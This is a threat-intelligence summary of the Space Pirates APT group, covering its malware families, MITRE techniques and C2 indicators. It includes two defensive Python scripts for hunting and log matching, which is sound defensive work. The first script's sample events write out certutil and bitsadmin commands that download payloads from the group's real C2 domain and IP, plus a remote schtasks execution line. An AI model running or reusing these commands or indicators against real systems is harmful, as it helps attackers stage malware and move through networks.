Space Pirates: investigating the tools and connections of a new hacker group

Space Pirates is an Asia-based advanced threat group whose toolset spans several custom backdoors and loaders, used against government and aerospace/energy organizations in Russia, Georgia, and Mongolia. The report ties Space Pirates to several other APTs through shared tooling, describes specific malware families (MyKLoadClient, Zupdax, BH_A006, Deed RAT, RtlShare, PlugX, Downloader variants, and more), and outlines their network infrastructure, C2 protocols, and persistence and evasion methods.
#SpacePirates #Zupdax #MyKLoadClient #BH_A006 #DeedRAT #PlugX

Key points

  • Space Pirates is a newly named APT observed using a mix of bespoke loaders and backdoors alongside publicly known malware (e.g., PlugX, ShadowPad, Poison Ivy) against targets in Russia, Georgia, and Mongolia.
  • Core malware families include MyKLoadClient, Zupdax, BH_A006, Deed RAT, and RtlShare, with additional components like Downloader variants and PlugX, plus a custom C2 protocol stack.
  • The group relies on shared network infrastructure and DDNS domains; its implants speak a custom protocol over TCP/UDP and support flexible C2 strategies, including a DNS-over-HTTPS fallback (the IoC list includes https://dns.google/dns-query).
  • There are numerous overlaps with other Asian-origin groups (Winnti, Bronze Union, TA428, RedFoxtrot, Night Dragon), suggesting tool and infrastructure exchanges and possible collaboration.
  • Space Pirates employs sophisticated loading and obfuscation techniques, including DLL side-loading, reflective loading, multi-stage loaders, UAC bypass, and service/registry persistence mechanisms.
  • Victims include government entities and the aerospace and IT sectors; some intrusions persisted for months, with network reconnaissance early in the campaigns followed by extensive data exfiltration.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – “Space Pirates uses phishing emails with malicious attachments.”
  • [T1566.002] Phishing: Spearphishing Link – “Space Pirates uses phishing emails with links to malware.”
  • [T1059.003] Execution: Windows Command Shell – “the malware has remote command line capability.”
  • [T1059.005] Execution: Visual Basic – “Space Pirates uses VBS scripts, including ReVBShell.”
  • [T1106] Native API – “uses WinAPI to spawn processes and inject shellcode.”
  • [T1053.002] Scheduled Task/Job: At (Windows) – “uses atexec.py to run commands on a remote node.”
  • [T1053.005] Scheduled Task – “uses system tasks for persistence/remote execution.”
  • [T1569.002] System Services: Service Execution – “creates malicious services.”
  • [T1547.001] Boot or Logon Autostart: Registry Run Keys / Startup Folder – “uses Run/RunOnce keys for persistence.”
  • [T1548.002] Privilege Escalation: Bypass User Account Control – “various UAC bypass techniques are present.”
  • [T1068] Exploitation for Privilege Escalation – “mentions CVE-2017-0213 for elevation.”
  • [T1027.001] Obfuscated Files/Information: Binary Padding – “RtlShare appends random bytes to the payload.”
  • [T1027.002] Obfuscated Files/Information: Software Packing – “BH_A006 obfuscated with an unknown protector.”
  • [T1036.004] Masquerading: Masquerade Task/Service – “services use legitimate-looking names.”
  • [T1036.005] Masquerading: Match Legitimate Name or Location – “masquerades as legitimate software.”
  • [T1055] Process Injection – “injects shellcode into processes.”
  • [T1055.001] Process Injection: DLL Injection – “inject DLL into other processes.”
  • [T1078.002] Valid Accounts: Domain Accounts – “uses compromised privileged accounts.”
  • [T1112] Modify Registry – “Deed RAT stores configuration and plugins in the registry.”
  • [T1140] Deobfuscate/Decode Files or Information – “encrypts configuration and payload with various algorithms.”
  • [T1197] BITS Jobs – “uses BITS to download payloads.”
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – “rundll32-based loading is used.”
  • [T1553.002] Subvert Trust Controls: Code Signing – “some Zupdax samples are signed with stolen certs.”
  • [T1564.001] Hide Artifacts: Hidden Files/Directories – “stores malware in hidden ProgramData folders.”
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – “uses legitimate apps vulnerable to DLL side-loading.”
  • [T1620] Reflective Code Loading – “uses reflective loading to execute payloads in memory.”
  • [T1555.003] Credentials from Web Browsers – “ChromePass is used to extract browser passwords.”
  • [T1003.001] OS Credential Dumping: LSASS Memory – “obtains LSASS dumps for credentials.”
  • [T1090.001] Proxy: Internal Proxy – “Deed RAT discovers and uses proxies to reach C2.”
  • [T1087.001] Account Discovery: Local Account – “collects local user accounts.”
  • [T1087.002] Account Discovery: Domain Account – “collects domain accounts via CSVDE.”
  • [T1082] System Information Discovery – “gathers OS, CPU, memory, disks.”
  • [T1614.001] System Language Discovery – “collects LCID language ID.”
  • [T1016] System Network Configuration Discovery – “collects network parameters.”
  • [T1069.002] Domain Groups – “collects domain groups via CSVDE.”
  • [T1083] File and Directory Discovery – “discovers documents like .doc/.pdf.”
  • [T1033] System Owner/User Discovery – “gathers user data.”
  • [T1057] Process Discovery – “uses tasklist.exe to view processes.”
  • [T1021.002] Remote Services: SMB/Windows Admin Shares – “uses atexec.py and psexec.rb for lateral movement.”
  • [T1119] Automated Collection – “searches and copies documents.”
  • [T1560.001] Archive Collected Data: Archive via Utility – “archives stolen documents with 7-Zip.”
  • [T1056.001] Keylogging – “can log user keystrokes.”
  • [T1071.001] Web Protocols – “Deed RAT can encapsulate protocol in HTTP/HTTPS.”
  • [T1071.004] DNS – “encapsulates protocol in DNS.”
  • [T1132.001] Data Encoding: Standard Encoding – “compresses with LZNT1/LZW.”
  • [T1573.001] Encrypted Channel: Symmetric Cryptography – “encrypts network messages.”
  • [T1008] Fallback Channels – “can operate via multiple C2s and update via web pages.”
  • [T1095] Non-Application Layer Protocol – “uses custom protocols for C2.”
  • [T1105] Ingress Tool Transfer – “downloads utilities from C2 using certutil.”
  • [T1571] Non-Standard Port – “uses non-standard ports for C2.”
  • [T1572] Protocol Tunneling – “tunnels traffic using dog-tunnel.”
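Several of the techniques above are living-off-the-land patterns (certutil for ingress tool transfer, BITS jobs, rundll32-based loading, CSVDE for directory enumeration, remote scheduled tasks) that are cheap to hunt for in process-creation telemetry. The following is an added example, not code from the PT report or from Space Pirates' tooling: it runs a small set of command-line heuristics derived from the table over constructed Sysmon-style events. The events, hostnames and paths are made up for the demonstration; the domain, IP and file names reused in them are the ones listed in the IoC section of this summary.

```python
"""Hunt for living-off-the-land patterns from the Space Pirates technique table
over Windows process-creation events (Sysmon Event ID 1 style).
Added example for this summary; not from the PT report. All events are constructed."""
import re

# Constructed sample events: (image path, command line). Not real telemetry.
EVENTS = [
    ("C:\\Windows\\System32\\certutil.exe",
     "certutil -urlcache -split -f http://micro.dns04.com/cc.tmp C:\\ProgramData\\cc.tmp"),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe C:\\ProgramData\\Intel\\client.dll,Start"),
    ("C:\\Windows\\System32\\bitsadmin.exe",
     "bitsadmin /transfer upd /download /priority high "
     "http://207.148.121.88/siteadv.exe C:\\ProgramData\\siteadv.exe"),
    ("C:\\Windows\\System32\\csvde.exe", "csvde -f C:\\Users\\Public\\ad.csv"),
    ("C:\\Windows\\System32\\schtasks.exe",
     "schtasks /create /s FILESRV01 /tn Update /tr C:\\ProgramData\\client.exe /sc once /st 00:00"),
    # Benign look-alikes that must not fire:
    ("C:\\Windows\\System32\\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
    ("C:\\Windows\\System32\\certutil.exe", "certutil -hashfile C:\\tmp\\a.exe SHA256"),
]

# (technique ID from the table, short description, pattern over the command line)
RULES = [
    ("T1105", "certutil used as a downloader (-urlcache with a URL)",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("T1197", "BITS job fetching a remote file",
     re.compile(r"bitsadmin(\.exe)?\b.*/(transfer|addfile)\b.*https?://", re.I)),
    ("T1218.011", "rundll32 loading a DLL from ProgramData",
     re.compile(r"rundll32(\.exe)?\s+\S*\\ProgramData\\", re.I)),
    ("T1087.002", "CSVDE export of directory objects",
     re.compile(r"\bcsvde(\.exe)?\b.*\s-f\s", re.I)),
    ("T1053.005", "scheduled task created on a remote host (/s <host>)",
     re.compile(r"schtasks(\.exe)?\b.*/create\b.*\s/s\s+\S+", re.I)),
]


def classify(command_line: str) -> list:
    """Return the technique IDs whose pattern matches this command line."""
    return [tid for tid, _, rx in RULES if rx.search(command_line)]


def hunt(events) -> list:
    """Return (technique, image basename, command line) for every matching event."""
    hits = []
    for image, cmd in events:
        for tid in classify(cmd):
            hits.append((tid, image.rsplit("\\", 1)[-1], cmd))
    return hits


if __name__ == "__main__":
    for tid, image, cmd in hunt(EVENTS):
        print(f"{tid:10} {image:14} {cmd}")
```

The patterns are deliberately narrow (a URL must appear for the download rules, the DLL must sit under ProgramData for rundll32) so that the benign certutil and rundll32 events in the sample do not fire; in production they would be joined with the parent process and the user context, since CSVDE and schtasks are routinely run by administrators.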

Indicators of Compromise

  • [File Hashes] 5847c8b8f54c60db939b045d385aba0795880d92b00d28447d7d9293693f622b, 56b9648fd3ffd1bf3cb030cb64c1d983fcd1ee047bb6bd97f32edbe692fa8570, and 2 more hashes
  • [IP Addresses] 207.148.121.88, 47.108.89.169, and 2 more addresses
  • [Domains] microft.dynssl.com, micro.dns04.com, and 2 more domains
  • [C2/URLs] TCP://ftp.microft.dynssl.com:53412, https://dns.google/dns-query, and 2 more URLs
  • [File Names] Петербургский международный экономический форум (ПМЭФ)____2019.exe (the file name is the Russian title of the 2019 St. Petersburg International Economic Forum, SPIEF), siteadv.exe, cc.tmp, client.exe
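The network indicators above mix three confidence levels: dedicated C2 addresses and the DDNS names (high), the non-standard port 53412 (medium on its own), and dns.google, which Deed RAT uses as a DNS-over-HTTPS fallback but which is also ordinary traffic. The following is an added example, not code from the PT report: a matcher that applies those indicators to constructed DNS/proxy log lines, treating subdomains of a listed DDNS name (such as ftp.microft.dynssl.com under microft.dynssl.com) as matches while leaving the DDNS provider apex alone. The log format, timestamps and internal addresses are made up; the indicator values are the ones listed in this summary.

```python
"""Match the Space Pirates network indicators from this summary against
DNS and proxy log lines. Added example, not from the PT report; the log
lines are constructed, the indicators are those listed above."""
import ipaddress

DOMAINS = {"microft.dynssl.com", "micro.dns04.com"}
IPS = {ipaddress.ip_address("207.148.121.88"), ipaddress.ip_address("47.108.89.169")}
C2_ENDPOINTS = {("ftp.microft.dynssl.com", 53412)}   # TCP://ftp.microft.dynssl.com:53412
C2_PORTS = {53412}                                    # non-standard port from the IoC list
DOH_RESOLVERS = {"dns.google"}                        # fallback path; also legitimate traffic

# Constructed log lines: "<timestamp> <source IP> <protocol> <destination host> <destination port>"
LOGS = [
    "2019-06-03T09:12:01Z 10.0.0.15 dns ftp.microft.dynssl.com 53",
    "2019-06-03T09:12:02Z 10.0.0.15 tcp 207.148.121.88 53412",
    "2019-06-03T09:12:05Z 10.0.0.15 https dns.google 443",
    "2019-06-03T09:13:00Z 10.0.0.22 https www.example.org 443",
    "2019-06-03T09:14:00Z 10.0.0.22 tcp 47.108.89.169 443",
]


def in_watchlist(host: str) -> bool:
    """True if host equals a listed domain or is a subdomain of one.
    The provider apex (e.g. dynssl.com) alone is not a match."""
    labels = host.lower().rstrip(".").split(".")
    return any(".".join(labels[i:]) in DOMAINS for i in range(len(labels) - 1))


def assess(host: str, port: int):
    """Return (confidence, reason) for one destination, or None if it is clean."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None and ip in IPS:
        return ("high", f"known C2 address {ip}")
    if (host.lower(), port) in C2_ENDPOINTS:
        return ("high", f"known C2 endpoint {host}:{port}")
    if in_watchlist(host):
        return ("high", f"DDNS C2 domain {host}")
    if port in C2_PORTS:
        return ("medium", f"non-standard C2 port {port} to an unlisted host {host}")
    if host.lower() in DOH_RESOLVERS and port == 443:
        return ("low", "DNS-over-HTTPS to a public resolver (Deed RAT fallback path; also legitimate)")
    return None


def scan(lines) -> list:
    """Return (timestamp, source, host, port, confidence, reason) for each flagged line."""
    hits = []
    for line in lines:
        ts, src, _proto, host, port = line.split()
        verdict = assess(host, int(port))
        if verdict is not None:
            hits.append((ts, src, host, int(port), *verdict))
    return hits


if __name__ == "__main__":
    for ts, src, host, port, confidence, reason in scan(LOGS):
        print(f"{ts} {src} -> {host}:{port} [{confidence}] {reason}")
```

The low-confidence DoH rule is only useful when correlated: a host that resolves a listed DDNS name and then opens an HTTPS session to dns.google within seconds is a much stronger signal than either event alone, so in practice the matcher's output should be grouped by source address and time window rather than alerted on line by line.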

Read more: https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections/#id5-2